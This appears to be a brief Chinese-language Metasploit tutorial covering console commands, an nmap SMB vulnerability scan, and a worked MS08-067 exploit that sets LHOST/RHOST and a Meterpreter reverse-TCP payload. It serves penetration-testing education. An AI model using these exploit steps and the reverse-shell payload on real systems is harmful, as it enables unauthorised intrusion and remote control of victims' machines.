一、渗透攻击基础
1.常用命令
show exploits 显示Meta框架中所有可用的渗透攻击模块。
show options 显示模块所需要的各种参数
back 返回Meta的上一个状态
search 查找模块
use 使用模块
show payloads 输入此命令时,Meta只会将与当前模块兼容的攻击载荷显示出来;
set payload 选择需要的payload
show targets 列出受到漏洞影响目标系统的类型
注意:Auto Targeting 攻击模块通过目标系统的指纹信息,自动选择操作系统版本进行攻击。但是,在做攻击时最好是通过人工确认目标系统的系统类型等相关信息,准确的制定攻击,避免发生错误的、破坏性的攻击。
set 与unset :设置某个参数与禁用相关参数
set TARGET 可以设置目标系统类型
setg 与 unsetg 对全局参数进行设置和清除
save 将当前设置保存下来
二、攻击实例
nmap -sT -A --script=smb-check-vulns -P0 192.168.3.13
注意参数:-sT 是隐秘的TCP连接扫描(Stealth TCP connect),这个参数进行端口枚举是最可靠的。
-sS 隐秘的TCP Syn扫描
-A 高级操作系统探测功能(advanced OS detection)
2、全端口攻击payloads:暴力猜解目标开放的端口
对所有可用的端口进行尝试
use windows/smb/ms08_067_netapi
set LHOST 192.168.33.129
set RHOST 192.168.33.130
set TARGET 3
search ports
set PAYLOAD windows/meterpreter/reverse_tcp_allports
exploit -j
3、资源文件Resource files
MSF终端内包含一系列自动化命令的脚本文件。